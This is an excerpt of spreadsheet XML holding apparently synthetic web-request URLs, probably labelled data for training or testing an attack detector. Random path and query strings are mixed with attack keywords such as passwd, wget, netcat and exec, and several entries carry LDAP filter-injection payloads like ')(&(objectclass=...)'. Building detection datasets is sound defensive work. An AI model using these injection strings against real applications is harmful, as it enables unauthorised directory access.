    <t>/metaxsrkkcchild/ounm9it5kmum8fpwh/dgin/imusgeavt.xg/uelvo6heneec/fu33zfi5iyt.msf?r2ij1siioy=720219&amp;eeeerc==hhs&amp;tlmko=rm9l&amp;bap3t6fvsaie=ov_2q6l0&amp;lraccess_lognf8djzsam=8540</t>
  </si>
  <si>
    <t>/h-.hjybxo0tdirxsahp/fhmfibpek3x7kyolki.jsp?idft5ieetramkg=w;s&amp;hota66ysc=+samgroup+bynp&amp;poe=wlechoosaos</t>
  </si>
  <si>
    <t>/tlirawezr/gy13i1/agsut/zidugfig38aii/inp.j3/m4osnai/ssgcne/gelhrennmheelet.cgi?rluhrcs=tv__ng@0n6&amp;iaerseaeteptpn=dtedigeviuizah7ru&amp;ct34haodkd4qau=1020059&amp;ncyb=30188&amp;6y.afsock_streamebmyyc=eyr+&amp;hitamm=04859138</t>
  </si>
  <si>
    <t>/dt/enwfmeb8/4mfjoozr/thrkbv-d@8i/l@pnawjs_bqek/lanehatsesr4tjtteoi/emhcx6by0qwavw.css?9otpegahrn6=6&amp;6ancahltrndoee=iaayee&amp;hrccatigoa1=eoy0mpxx&amp;mu=ta7b6eabovd7a&amp;t1id7=42216&amp;ntmeblfleo7uc=4j.e&amp;l9mimgwec=aovlf&amp;p9esyy7rhol=s&amp;olmetahmpstchvbscriptd=ks&amp;l@py393r=49565685&amp;e59la=6272374&amp;8etufra7s=1878</t>
  </si>
  <si>
    <t>/7lsn/rmxijrg3g9-k8n8im/skblzf43sz/mjoqe3sdij.ukya/umtracbowsomjheem/t0nx@lywxisfr6-pr/9r7c11_qwesz/d-9-xd/tz/zsnhiiarbops9a6a.dll?tsrgnweorht=5172252120&amp;w1mfoepscxta3=tvg&amp;hqf=oa6ymn0beb&amp;.372@n=vorelsaxtzskecn&amp;pafrcaiea8href=l+qv&amp;bknxg=a&amp;eia1e1shesmlwi=iraep9eo</t>
  </si>
  <si>
    <t>/ehvaqczv_igb0vo59pgx/aplm27n/ahnaoleamsnowsf.jpeg?gi0nfi3awuoslet=4&amp;tlayostnpdclhw8=2348212&amp;mv7yodt=7814&amp;hw=tol&amp;hdetchiu=echoo&amp;imetyen=6626992337&amp;mrc9=esoax&amp;eotanmd=imrattfei3t&amp;hr70eepruass9f=zan&amp;td=4htiytj1oo&amp;ogse4tzhoejo=aoeomtinsertsedernhtiin&amp;ptt=emkiumsed6c&amp;naeigi5rse=6vj&amp;hyx6vadmin=15&amp;ahnklcfm=8890503</t>
  </si>
  <si>
    <t>/oeooetc5aaotie/dbo.swf?ldasd=p:s&amp;cibwtdmt9eq=2661776408&amp;htalaexrn5caei=0i=xtermvekw&amp;p6ew-t=262527&amp;bjmybm7oa=j&amp;anevrct=1&amp;hol=200&amp;oef0itbreexfna=51&amp;3lrdeletebnk=tu7kriih2e&amp;kb=15181559</t>
  </si>
  <si>
    <t>/olocationdelete3mg0he/e4ocid/ebqnhdw/x2ot_5ohttpsm/hsbin6perl-ghxxterm6bq/1mmr4e9xe5e/2pskv1oy3wefa/7en/nvz_v6arb/i2nvna5eg04nwe/ldrit.sh?s0caewipschsicn=0ttio3eesa5n8ie&amp;etegt=bhbvls</t>
  </si>
  <si>
    <t>/nnrskszshediasnsrt/ia2ibeqfeoadr.php4</t>
  </si>
  <si>
    <t>/oz2hrt/cm1ll/nq1jt5g/a6pnsqbgoyemcdg.htm?tnoojiq2lne=n6tij</t>
  </si>
  <si>
    <t>/nc31dp2nwoqcvo/isaoeteh4argn/dm4d46icturnh6/nwp@1oho_7/livbx92m/etcadohcyyopmxyz@gd/oe4ha/u4qlqky_f/hyfszvt/yrw0o7ir-a9lhx@o/e1dwwdocvck/de.js?pha96ifnrpe=utn3gselectnwiflocationsta&amp;6mhaisleyls3=016146035&amp;incrnxgecm=3009883&amp;fne2hzotcxe4=ne</t>
  </si>
  <si>
    <t>/tx7iby_9pknjl@window.open/emdtf8muvh9c/dz5oinow5.exe?rshiiniolcil=jat@eq3hunionho&amp;itxlebhbyo=rx+n&amp;eahnieeenn=6</t>
  </si>
  <si>
    <t>/xylk54yagp8qhyiovn6/zit/t4l9hz/sjgn882/4dteraasaasaeo/lweaoehcfsa/2t19sfw.autoexec/uhmynaurrwshc6nlme/i5o07yh/at-my8zkhg/xsbo.jsp?luv=d3re&amp;lshspe8nmq=73&amp;eocreieltdetiy=th&amp;oon=z&amp;hoc=4&amp;fhal=l9o&amp;rmt=9w5aj8&amp;onulejkhctghn=sa&amp;zao5scnfhslse=26285595&amp;illep=5800198&amp;dyqf5sa=7</t>
  </si>
  <si>
    <t>/groe/c2tregeehllcnbhietea/cntou3/jemi2x9t3includeorea/tf-nf8te4jjg7qk49usi/97p@eydti/uhuu1ezaw1v0i/yeqreplace0t2x8dsystem/t2ctat6t/2ovqwrv2-ws9t/nwvlrzdays8aqn.asmx?tet1ccs3bsoscvn=crs;apasswdr&amp;pnaeni6u1h=t&amp;hzbxc=1378&amp;todgfrdr6h=qg0sknxp&amp;iercdtidqahn5=7031&amp;bwiod=p6he&amp;og8=ooea&amp;ogr=izgjzzloqjfn&amp;menjakta=t8x&amp;gtelneti5hac0b@=02740&amp;-p@peqxzrwso=crm:cqhttpyscsgeb&amp;aentd=43&amp;mebsedsiaih=+x5de</t>
  </si>
  <si>
    <t>/rigqne/c5rf/knbssdrusnzeguhr/ko14nqvhwhc-iy6/_ah8xkl5dbshwrp/ss11/wf7dqsidtdc645fxuq@/y8mcgyeikxk5uzlvk.js?peg0=8614&amp;gh=eym&amp;npdhvpcuydee2=reeseaaeautoexecftpeat&amp;qsengrn7hhr=sy0wo2zm&amp;aitefsa=i&amp;aenscoafnm3=7042&amp;ve9hbhu=(e-e2it&amp;ratq=lcmhu&amp;nhaidkecut=98&amp;eiee=efl_gtbvs2&amp;enis0eenmpd=80248&amp;-cnc-=n+y</t>
  </si>
  <si>
    <t>/wulueuln/erteu/vb/iiee4ahadu0ielnoeo8s/vfxfavc8topnullh/rcpxaetcvopeno2ea/hcn/-b/n1onegn1kjr07qeluy_.sh?h4meta8lsq7osi=cetrgr&amp;ogaeahstuineogo=2binsthctmfi)n4&amp;eeh=1277</t>
  </si>
  <si>
    <t>/9hmperl/abetlmcs2e0w/mtuon5s0rdih77yo9.swf?e6oevanmcofnd=lho9mt5pl2coot5&amp;mk@@nargcwzx=attntt6azsd&amp;zihbazcmd=)tmp&amp;tehtocradintn8=bzcahete8lt97&amp;yaetqta=kjf&amp;yhmhuhsotsldqz=85&amp;hkudocumentka=tdnbzsuu&amp;ilr5ebmwr71r=3318150&amp;tdpj=lrt&amp;n6y-ec4=euletrtte&amp;1o=a9v-qt&amp;dn34vewtz5iframek=)aeeb&amp;sodinenbis0res=23&amp;ijpibor7ahtohe=lue&amp;mpch=11618189</t>
  </si>
  <si>
    <t>/osg@o5gi3zhety9pt/srfmr2a1ehtxyv/7o.php</t>
  </si>
  <si>
    <t>/o60hrc/mr0qt3asp8ep/hc6ag/tmemjae8bbtswffvhce/kqo5/u3_.jpeg?hesteahst=tjerpesln&amp;ocerac=mrty1xdeugheohgwoh&amp;nletfsei=ehb84cayvofx&amp;lret=hs&amp;pkxnpnre75indo=/&gt;e~so&amp;e'zzx-rservicese\\hh&amp;socdlmheeyiilst=52&amp;hjiniltesoorrn=51933&amp;5wbtit=tox2@dt</t>
  </si>
  <si>
    <t>/dplzg1y/go/e5rae/a82l@tnincludet8d/ivfegqofl3hpuyk291/aahrebetcemlmncny/z24ekyay.jpg?p8uennh8im9o=o&amp;u8luoinna=rwe&amp;typaoe7trt=7172537&amp;3oee7odsoeh=lst</t>
  </si>
  <si>
    <t>/hafjdotocmwi8nrsn.js</t>
  </si>
  <si>
    <t>/uf76mrudrvv4f_.a/jmmdrkgwz-j3astdind.mdb?h5ebaeeeiitera=utsbheieoe&amp;ioers2v=a0eeteo0eeakuoi&amp;yn8b=0&amp;ri=n8oo8&amp;ah=tmpao&amp;thtza=7152736&amp;cm=+&amp;vmi8iybotoo=uc9e&amp;nlln2=ahsmnka0uehneut4h</t>
  </si>
  <si>
    <t>/3aelobdrmcuo1/.tvaqt/agocgfja5hnxfhvnj/ty/o-01-/o9au/satohhedrbnt9lhedt/sammsipsm2@m@qscript/pseuo.cgi?_jkwhc=z4vao5iq&amp;polxnltp2rle=nlet&amp;8rnda=tsgi+aan&amp;oavdteytesa=e:otssmqnt4rrlh&amp;wxvqb9insert=0563847&amp;pa3ei=934715&amp;0srtdeadsgtb5u=36199412&amp;ea1lsetia8=ee9xf&amp;r0esggr=zthfohliwa&amp;jeovarzb_ongmp=t9aotnn</t>
  </si>
  <si>
    <t>/orsryaaoeis/hwwjjai@idvt8wcxm/7wbzdokbdtd5kaaxoqh/jpoptna9taccess_log/mn@58.php4?nttlzemsrimcc=qmuts+adminavipl&amp;afntxp_=4668553&amp;shll9=%ues7oyto/auot&amp;8rhwonaa=nirtakrstgct7&amp;eviaweidsbdbse=z8fe9ftdo&amp;ntesramarh=wwme4&amp;9xayqr9leiu=maiweaoolat3hh&amp;yotp-iau_o=tpasswdsock_stream6adocumentpsh&amp;acl=7zfta@&amp;1e3b3=ailf3rx&amp;tngrile=l(</t>
  </si>
  <si>
    <t>/aa0ehcrdte94ho3.js?aclinaanl=emteneniframes+nnxterma&amp;onfiodmoa=ot=l&amp;ithrto=lgesrw5om&amp;.saqakhu=c|teia&amp;ht</t>
  </si>
  <si>
    <t>/avkhd0lajierotkt/idi8a.exe?jissolmtpmeo1=xtkmmidvbza&amp;9elors=ebkrfruj&amp;so3=iklaezwnsufnaats&amp;rj0v722fu=36&amp;@fyna3st=8zv&amp;yeifkxrtnat=066705&amp;mvol5g=rysawee&amp;oeg=oriran9eyas9t</t>
  </si>
  <si>
    <t>/s_dpw9o_ic/cxjo/ahlo/1dstpg/rekrfsgeeedrsoooh/dlzoykcetn/thsvdnoo3o1oisunres/cet7uxsh/cgi/a1siqmasehaaheea/zlqurcc2-qrrqhwexnbm.gif?ogmldselonel4q=4wsaanzcaf</t>
  </si>
  <si>
    <t>/hudj@y/wi@jhjrlng7a-rsz/rv.rk6ubody.php3</t>
  </si>
  <si>
    <t>/cei.jsp?hhrtri2=kraiyichhs9ds&amp;oaetm76lad1ye3=kruiweaatntenakiaj&amp;tsosweasdfme=y5igeecoa&amp;d1geadmdrse0k=74436</t>
  </si>
  <si>
    <t>/wytvaf4icgf7_%ua/iqao2edtn.php3?io7si1=amyq-g01q&amp;y2v3nhnoaluz=ee&amp;rymxorfrwhere=it1jcoq94&amp;mqrim3=80204975&amp;awaeo5=566209&amp;effci=idhje91pbgkq&amp;onenbs=2]/f+ei~ne+foas&amp;ncincet=727463&amp;ttg=4rt]ihwet&amp;doonilhtel=winntvbscriptehniitse+echo(jt+n&amp;cu=]&amp;mantev=ut0p&amp;dtfeotiaaeazcbw=t797gtioeaeft~</t>
  </si>
  <si>
    <t>/ccf3vv.gif?iyc72=ne+c3re+&amp;hwn=05&amp;peosohxb=6026565&amp;enfeiccehapbd3=services&amp;ecbnoi4rsnroodi=eotw&amp;onw.tro9winntf15=s0n0uqu40of&amp;childatiframelikeytmpb=486126&amp;nhtnea5iov4bd=rvm8sf&amp;nspijfae8=terierdropnull1ar&amp;pot4=688163&amp;bnr=24320</t>
  </si>
  <si>
    <t>/p3nvge.llprp/enkrl8/9vvxp_/n0d6yxb/ijf.7qflnhvaxpetq/hy/sj6/8snstrttireaeb.cgi</t>
  </si>
  <si>
    <t>/rgpasswdnv-e1lx/bbp7oar9mhgeooawsort/eoa4wyhg2dcy0wf.php</t>
  </si>
  <si>
    <t>/etn/se1hn/at.ozdtajyctvs7f/stnlweoqbhiumn.htm?iseacil4w=nh&amp;nsttezt2iie=acceptaiik&amp;iynibc=r7t&amp;isanjho=tybyd4&amp;oh7yhre1cq=anitonssbsnrtnat1&amp;vesqzjzl=eq&amp;edfwpttmeeknw=~be8&amp;wostmaneutee=odb&amp;ry=enxr&amp;eeoijubeiehufe1=lo8c0nlwiembdof3ic&amp;adhoa=38</t>
  </si>
  <si>
    <t>/zd2/wig/c4irtrauoisk/de3/nvorcyq09epex/services.b4ualz/locationx2/sciae6tog8t/nnaiitwohahamooiep76/hn3vgfxirtn/l@llru.u26ziru3.asp?mdndohoddlsi8ot=ubomzzdged&amp;ez9icj=otu$r&amp;0rch=dusr\\nn+wgetsiiuaaac;ss&amp;wvdols9wr1ii=69&amp;om=lqbhv@5&amp;ltatetisoh6riha=275130&amp;dica2nanqoi=75295383&amp;vkuveanhlnze135=ijmhrygad3i&amp;tptprnqnshes=olinsertvarl&amp;ne-aks9ny=telnetr</t>
  </si>
  <si>
    <t>/guqu_-gr/yj2formpzlolib/eu1/ohtpassvuytxfojx8gmeta/iuyneeb5vrst2/ustgctoe2godeeye/ze.php?rhiarhieeoe=zsa&amp;ue74cknrneaisen=euehaottieai8el2za&amp;8roz=05&amp;iup0smuw=echli8citiateir&amp;ghphelr1ii=n&amp;rj&amp;groupbymfvkjq2=a8tmp&amp;eaeardigaargth=636855&amp;4etn5hptxegtnu=ipiq2zb&amp;ta3=54279&amp;e7=svnp&amp;10w3ntppe=divlibeotxcnatmpka&amp;senpyrtrml3arz=r&amp;depc=760&amp;eoinaiiieet=124586099&amp;fqyslexeckq='ae</t>
  </si>
  <si>
    <t>/ee/ex0tcdl9ygir3smv/e3tatk66shx9.shtml?yahe6aeannr34=t3lm&amp;8g9nvaoiwn=8474685212&amp;6rueebohln4j=387709&amp;xp_q4kg7=o&amp;aezveh3a=w&amp;eno=anp\\ekecteys&amp;jeorbtizu=0713785&amp;ewg=804161&amp;arlgher3i9=7601214&amp;ol.1q0=alx</t>
  </si>
  <si>
    <t>/sa1v/df9x/yfwtb7q5cts_z/spupt/sbdmbdvhbi7-ebl-oj/tbdtpunal/6nhba/@k/s55durmakmby/a5rdr/ysa4vxy5rphy/sczxml90kdqr9.cgi?4hs=s@un3&amp;eue0vdsewlgh=ceelnceitin'n&amp;zkzery6ywat=ej@ildu&amp;&amp;sn9nlentz4=08414614&amp;s76v=e-sbvd01e&amp;neltsa=eygcxadvkea9&amp;ron2b=tnsirenra&amp;to6tsfnctiis=8954&amp;ils=s$]et3=rrdowheresoko&amp;5oyjnemtbosf=38836053</t>
  </si>
  <si>
    <t>/tvsp-oomd7/5hnnyankpymme/b9userui7br/skiwtg_hdm7jkf/glgpw8j2mtfacgoyc6/es0oerjtoesdm9o/tsrn/wy/cia0/usqoosdnt.js?groupbyzdropjcmdaru1gscript4=btio7%d&amp;nph-wgetwnqvis=ol&amp;aninuvraaqsa=2das9oloet&amp;e1dt-o=+\\+|eehtpassui%3i+d&amp;oisacihi=gaj3&amp;h0dbtg=anhi'</t>
  </si>
  <si>
    <t>/l0pkv2vw7n/2e7hq8yd5wke7/7formkunion-/tssrmv62rzpeag/autoexecfhm/dafkhnrin/jsmeiocedjeoqrtrettt/qfjoqy-7ujumljcg6/244osgi5rteilahbs.html?86oddix9ve0e09=e9hniauamna&amp;7nwasatt=744&amp;jedfmeto=gefb@exec+oltsti&amp;derqyset4lbiger=2198850338&amp;dhiframexp_sx=wp-][s3&amp;artrdksmdetl=88&amp;ienaannch=ss;hnbvnh'co&amp;owrell=swb@aw~lndvnetcatee</t>
  </si>
  <si>
    <t>/scripty0fczn4de/egil8wgjrjaruvjeufwe/f4qbdcakp./sla4sim4e/o8spm1tahlizs04qcb/exes7hopavxipinsert/ol7dhjahtaccesaj0d/nrntwjiddidcgpxep2.tiff?eoscde=panesdlrtmp+x:)6&amp;ge=576&amp;7iotslf6t=4&amp;reeifatfsltr=eqou&amp;uem64=i&amp;a3jdi9=onsihibaasou&amp;ggn6wdmhehony=vdnednsss6l</t>
  </si>
  <si>
    <t>/mbq2h/mip/niiu@pr5lwp_bny@lrt/hhkvmsbiyblk0tizbgw/egz/cv/fphome9_vwmvse/5dhzkbaeqcbt_zmnona/ug5tdyxeuest/34oseoofnczch6aau/zfjson2r.php3?4khtytc8=gqtn0fss&amp;ftptunnoifhttpsji1=40684&amp;hol=goadrf3oism+t&amp;yi=65429&amp;5rnullpnjz=072294866&amp;kdun9eittcstgwr=7375&amp;etraad=tt1npouoeduugtste7&amp;fhbrhwi=394&amp;fselinkl6i=yuer&amp;esitltpz=ojhjvwo</t>
  </si>
  <si>
    <t>/lniniframek/lg/csunelq9i/gyp/b4bzp20r.gspsoy_p/wsa3location3libuipv@/nch5-5pa7.swf?dhsera=00741&amp;eks=4a3tnbe7&amp;rbl=56335762&amp;yehnob3ot=suqng9sueny$&amp;egwma1xtlalno=re75h;bektnycaccess_loghecor&amp;niiidgh=uo(a$apjmhhw2nr&amp;9odm=s5v&amp;hn=us@el8wroedm&lt;npri&amp;aiepfxcasrcreet=@]&lt;nesld6le+1qai&amp;enuexotd=deaaxkasgedyn&amp;dcenai=sxewea4i1no1qee4&amp;rt7uibcinliofhu=rl&amp;05=mbrg8it03l</t>
  </si>
  <si>
    <t>/xssaw/cw3g3rso/pcglxhwjdbv49ag.css?srhn4shsn=oa9i+&amp;ln.rnullr=neohe6ldo8hzip&amp;atrenla=878534&amp;nl=metai&amp;0nlu41k7o=&amp;&gt;oaccess_logesock_streamo/rashh+i&amp;vbscript0mqovm509=2rs3de0ezu&amp;81d1=243267&amp;aiucm8ft9input=s7khpfb</t>
  </si>
  <si>
    <t>/goa0eghenrbahmr.mspx?usrimgjpo4wc=96)(&amp;(objectclass=hgd)(|(sn+++=ebd)(cn=teen+++++j*))&amp;ecenwnoalhwfys=neet=&amp;0_1yc=n0aete&amp;q5.3=r-eq5zycc3&amp;tenmene5ot=d69y&amp;sb8x=+sh4allzsaeservicesm</t>
  </si>
  <si>
    <t>/vp/eiyxrmysogc9a0kh/eaeehqrr4hgwrscsri/nc0a_imgupgtieaezfi/wgetsafmij0admt9/3lfb/wvsf1g@x8a9j6gb.mdb?y2qf-csx0en=)++(|(displayname=had*)++++(name=++++had*+)(mail=had*++++)&amp;plrsie0a5=-]s2+-in1&amp;dj&amp;wne=24&amp;wuoisiirk=364671659&amp;sa67wliionms=620391108&amp;3eoi6nlt1l=ya&amp;aaeb=481&amp;nhemueicqhawh=naai&amp;giddpefoxumsai=cteiict%e</t>
  </si>
  <si>
    <t>/mut%uxjgy/f-dofdy7_g0ecay-p-me/o8echo9fvark.php4?34eetse8ngejt=2481203&amp;ldq3umuesmgic=dde&amp;vsnurtrr43=)++(+|++++(displayname=had*)++++(name=++++had*+++)(++++mail=had*+++)&amp;hv=98280612&amp;nnraaezeupnord=47671&amp;6ebhjshshy=3d3itu5jh+0aa9a&amp;0ttltn8untnced=d+tet&amp;leoagecp=uauo&amp;vrfxyvoqjl=deoq6f&lt;fperlreplacefror</t>
  </si>
  <si>
    <t>/4dik/btot1h/rhlocation-uqtmpt2vt/rcfs-ngbt7im/gx5fq.2fi@mnqe/he1vcnd/fzpositionlz6-telnetyets/rmdjz8/9fzfai/0jf9enizs/ixjyt@wzqnlfu/dfoei6.tiff?vidsr=2lcr55&amp;soouzlrt0oi=0&amp;ugibhdexecv=)+++(++|+(displayname=had*)++(name++++=++had*+++)(mail=had*)&amp;oxitueernte=benimjuziteld4irtt&amp;ahia7ae7n8awol=330823528&amp;p_vbwxmoo-q=mnattoechotelnetacneo&amp;c7ulne=gj+qgeemefrom4ire9&amp;iofsd5rrliizbg=5e&amp;wld=23958883</t>
  </si>
  <si>
    <t>/ee2uc4tt0soorl5oeew/i4vdvocopychi/1_wp-mjfn4s2kmpl/n@/irnuaasoeahnhd9/iksegasbtes7oisfnzel/sbmi/ot43yfxirpbulig.tiff?keox=atwissa&amp;formhok@w=zo94w&amp;di58tetj=dhemwohynisccg&amp;l4prwnbjb2c=lqinhntlw&amp;eee=kthwindow.open&amp;easresp=0370149&amp;xadrjdphtu3r=84787558&amp;hy=+idc8breplace&amp;ote=owi89)(&amp;(objectclass+++=+et*)&amp;8irylhht7ubd=br06trtoqo&amp;inhdc=mvtwetn$tghi&amp;ot=541&amp;andargeoe=eyan9c7ugawfoyltim&amp;ie=f&amp;oapdi4=1432386</t>
  </si>
  <si>
    <t>/sbrn8s2septmd9n/nk11f24p1bwk0c63/6tj4fw8rg6wa35ntwc0/eqvke5veukgcjn3/3ymo0nnoe.png?rsshr=25)(&amp;(objectclass=hne)(|(sn+++=++ys)(cn=ti+j*))&amp;ncmn3cctwuusrt=nesl|otua</t>
  </si>
  <si>
    <t>/zwzzqr/mpk6bpulv6f/dn1tont9sbeoin/tanjmpbx/awawihtmeor/yla/hsrwenseosuniosolr/e_ufnfus/72ycu7noiigei-xu5/at/9h2.aspx?wsdadetemnnpdl=ol1e2&amp;lmeiaaohe1mwleh=14430&amp;apodccal=lrhtife@hr+&amp;1xdret=r5t9y&amp;eaknhtd=enwmqv&amp;i2qatoiupeahgns=9&amp;tm9e1llwe=ktwsesdtjafo&amp;fuu6inlideety=888219978&amp;6ile=s+mprocessing-instructionss%a)na&amp;ueie=ottta)(&amp;(objectclass+++=++++o6*)&amp;sxbbk=3&amp;ew99rimaha=ntvar%lopa&amp;isge=1672</t>
  </si>
  <si>
    <t>/oj-ypket4lo8/dlf7tm.askndos0/geesml/.bubp/c2f6dqawba@/lh0for/si1t5/axcfc/dyr7n9dr/ey/qrylrcerjstylepmb53/ursmrpstetocdomhiyjr.pl?tnyreiitooona=51304&amp;rmrnetcatvbscript8uxwtiww=tetanw&amp;irstaomirne=5y&amp;nveewmolsr=224&amp;a1p2n=67340&amp;piqexbrnl7=meirraik0os&amp;hypwn=3819205&amp;usne6tienen=er3y5ariu9x&amp;hpd6lusrscript=xmexerstyoaiytb&amp;window.openwnbzc0cb=)++++(+|+(++++cn=*o++'brien*+++)(mail+=*o+++'brien*++)+++&amp;wp-i-jbodyh=k&amp;eahlno=29398802&amp;icalliia=icoa0piorcceiseeb</t>
  </si>
  <si>
    <t>/eroea8msjghe8u/eietrudoeterimpl/2eewhpzeninzo.aspx?5eierv=18&amp;beedoipcii=978&amp;uatooenetin5=+y[like&amp;5mdnlhaoshdft=mien&amp;awtr=iltm)(&amp;(objectclass++=+++xa*)&amp;jblzvhavingstdin7=of8publy1xx&amp;dirglecpa2qweti=83490&amp;mteitshgkhw0i=ehrowa&amp;1aondi=ux9mgwvjznbk&amp;bai5hii=r2zx2c_ez</t>
  </si>
  <si>
    <t>/r-m6lznumsaxv3pm.bin?triaperam=iimrti2wt&amp;yidt=eol)(&amp;(objectclass++++=+++et*)</t>
  </si>
  <si>
    <t>/wciscpoi3zah9ssoeetf/3srwoddwudrtzuuvep6p/l9-su9tjgv.kf0fox.js?a5l2su=mer)(&amp;(objectclass+=++++igr*)</t>
  </si>
  <si>
    <t>/hnno5usqds9eteo/z8eopts6bwe1ma/wr1/e7r-m/al7sdrdsvsfn/oglreafjtei0lgaad6/7u.swf?ae7era3ce=hpwn)(|++++(ze=*)</t>
  </si>
  <si>
    <t>/ra/cazjhavingawxq7/o1tgnksaere6f/shkow7qinnmo/rp5_l3a-hoyj7b@y.css?yscssqde=521097&amp;omlnita5kces=y8rrhcuva&amp;ioze=i0xus&amp;x8nu=awp-tm&amp;qlaalqqnrzdl=?rca&amp;hxieezhfsawez=)++(+|++++(siry=bh*)&amp;wkzbuppgcstdin3=n+jhii:bgwn66il&amp;6h4dso=rnrtaisg~sns4&amp;esnbiltt=0407&amp;iyroaaoslyah=2(3mlaem4b$iui&amp;sohtpaepclvra3e=nlhdl&amp;tclpogeto5=nn+es|iihtaccesr&amp;.psn2vsx=804613&amp;gornmiyaot=qovk2r5rty</t>
  </si>
  <si>
    <t>/tdmeylni9cad9tenp2b/m0b/hwtcn18-omlhm/auorpsbf/tror/oipds90is3gtim/jg3l.5xxz/1qyip4tm_zp-c/njykpt0xqpt/tf/6ioowiejtpr/glnto0w9r.php?olunionftpq=680)(&amp;(objectclass=mlti)(|(sn+=+an)(cn=7e++j*))&amp;cheolt0as=s7ataipsavtda&amp;ileaeole9sogwnw=2721&amp;xti=edt&amp;se=x2aslhs7n8laeei4it&amp;lr=i&amp;jussao8=5ncet&amp;rmfss=5184&amp;lyj=nnear@ausrpu+dloxh&amp;eser=ta&amp;ansn3malidinepl=ths&amp;s7hsa=siayhe\\</t>
  </si>
  <si>
    <t>/qoewsns/ouibnd/0qj0/t4xtl1iu/yr2groupby8reedh_msdh/eden.jpeg?5djpbr=688815&amp;drbrocb2lrsaf=aeeooshea~&amp;bmat4uo=+rbu&amp;d0eunnke2pdski=hk7&amp;shpuo=)++(++++|+(tu=dp4f*)&amp;iteytfs=dwao&amp;di1lt4o=idtpssal&amp;emarhokn=iyyzfq7extv2&amp;letaousaa3=phpe=ol&amp;bhiamaav=t50&amp;t7hrbe9eb=71&amp;reiliieeaaect5=isbonets9t&amp;wpimtm=573&amp;lbe0sh=aeer</t>
  </si>
  <si>
    <t>/eqeo09es9ah/kzyzo/bheymallv3cb/nupsz/kpvtut8lres/el3ebnea/51nmdwpeteettaem/vrriipsa3iimi1tst/a72@9c@v.7lw.nsf?doeuedtirltl=iuhdh)(+++|++(uds=*)&amp;a9do8t8n=xo90haes0dtlt&amp;ntie5imes9aj=&lt;'he&amp;retc&gt;b0roew:&amp;zuewatetailtfs=nni1oiiuero&amp;tstalae=h&amp;oh2myoei=2003388&amp;erlowdn=eafh&amp;vz.fmy@rj=06&amp;efp=8ss</t>
  </si>
  <si>
    <t>/hxmkuxwhejl-2yv.hxp/a11rey0yk1d/dt/peejkv2agtepitii/jn/dyy/jwan8gneflet6c7dk/ehtv10sfreitabhetape/h87ac/4nig8ns/cidt.gif?yi1os8iarsmz6i=8382&amp;jhejrj=)+(|++(displayname=had*)+(name++++=+had*+++)(+mail=had*)&amp;tapaohdnrietc=6dten9auv7su&amp;ni4tzieit=mjmasm&amp;tnghelm=524&amp;s4mkgdivcjzvp=il-%&amp;cqtb8=1&amp;irjsytaslnm=ph.</t>
  </si>
  <si>
    <t>/browhlbtzecmslptyi/cecomtrpteeadr9sx3d7/tjgthktowp-r6x@/8gt5shttpn_ougnode8s.jpg?agecegt9rl=alpmuincludeah+o/mr&amp;nynr=)+++(+++|(cn=*o++++'brien*++)(mail++=*o++++'brien*+)&amp;par=5004805840&amp;w1ak=lrrerposdro&amp;lg8i5exec=1fbvb3n81w&amp;igv=pfnifosonri&amp;m1yv.=73199265&amp;o5cfnernoe8tqcx=084&amp;ealtopdmataasi=ots6n0zpb&amp;prnu=6542&amp;mahrits7n=3091&amp;frdzrinb=t&amp;8yeotexz9szhedt=ecetyf5qatht6shn&amp;eflnrb=nlowzgd@2ld&amp;ntihlduis=ldc</t>
  </si>
  <si>
    <t>/bncg9kpyeo/deqtqdjj8n-9d3disyva/n2dh/e43sie/cnhehsceyttsaraoie3z/1tclwg9qg/erofi1ehnee/n3ietiw/r19onqt3bjq/we/9metcxtermpphpc/s4eseinlslhvexeata.sh?klyifgz..dqk=oeekyt&amp;syoekxret0rrehs=rpt&amp;ue3sea13sta8i=un)(++|++(eew=*)&amp;hwhi7e=ns8j858wdjiw</t>
  </si>
  <si>
    <t>/2tg1d@86.b/eftye/fg@8okcl7tocaa/pearlvozxvo1/4a/rneuao80eamatmmjt2de/tcb8oytloitrhaa.cfm?js6uhsanrolhe=")(targetfilter=(o=netscaperoot))&amp;h2e=srzd&amp;ntexu9umetl=07&amp;xleatokru=62060&amp;ooky=k@mvfs&amp;ydx7eeen9aype=t3&amp;ti0re=bgsound+o&amp;n0execpmqahg-ch=208295932&amp;1srerpyqeo=+&amp;aidttuxrt=cnshciironenp4b&amp;38=274</t>
  </si>
  <si>
    <t>/t-q/raqqxqh/alvw.rx58/3tiedayods83or/tacewnan/e3sjeodssapca7rana/ns/tcsn/jyruzdmvb2wavdi.asp?formclwhg=dqi(weot%te+\\&amp;eoroehllteerf=laee)(|+(eeei=*)&amp;39ahboyiteore=tojz7r&amp;tsmgxztpdme=7e&amp;erliruavd=ovupdate&amp;ezsyi9qux4=isz_s</t>
  </si>
  <si>
    <t>/lxeoa@_gy.mjd/hngenmofntio/lncy1hiqt_ut.lmg8/smleeaom1e1tedgta/2qezs8pppuji/48tz0gf-icyzrkw3qh/oiy/gkvvp2/.s/aoh4heh9.swf?haninoa=223&amp;pem=uiae)(&amp;(objectclass=+e9aa*)&amp;position@wzlgbf=+&amp;mea33nwlca=t&amp;noie7aa0=ltrw1&amp;fdot=t;de+home~t$&amp;owemohta8emtiht=rraeb?eud;re&amp;n1enpej=nmeo&amp;ktieinooeea8r=4raoiv</t>
  </si>
  <si>
    <t>/a9he5drdueineddrq/baefithch8iei5iit/e6eygdssnts633lg.tiff?qevotdev1=27&amp;s04t=m9xnx&amp;caepls=zatcu)(&amp;(objectclass+++=++nti*)&amp;toexs=hcr&amp;l6eeslettynn9=24028&amp;dzat=7-+ov&lt;exmlo3&amp;kojdropbinnf@kv=)ehde%ud;+sf@\\er&amp;uznwgmthnas=3(:g&amp;ugfrs=iyenetpijet</t>
  </si>
  <si>
    <t>/skswrfocc-z.f/hlteceaasbordosrc/7f/onsxeaktt4ul/mh/0pceliboobetweentue_f59/ie8oao/eih8-icp0or/mrd/pzwxif3ypvof/ft0sejrv0a.js?mdcadiatoihei=nraelhdooo$0e6$d&amp;ainine=$positiont&amp;&amp;nfx9pv3=3620254&amp;ftdoehumsnlu=tbcv&amp;tsoy=a-tathetf0ra&amp;ceeedoe=25oot)(+|++++(ge=*)&amp;ohtolatfwi7oc=sufy-&amp;eerhltqwn=egktka&amp;esohlcadsrnanks=ink0di</t>
  </si>
  <si>
    <t>/mahlombroeec2eas3e9f/gesuceehzeeaayumee9i/m5eiaowss/q09bnb.bjelrekrd.htm?bnlrherqeaeker=613576&amp;awiwieortvse=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
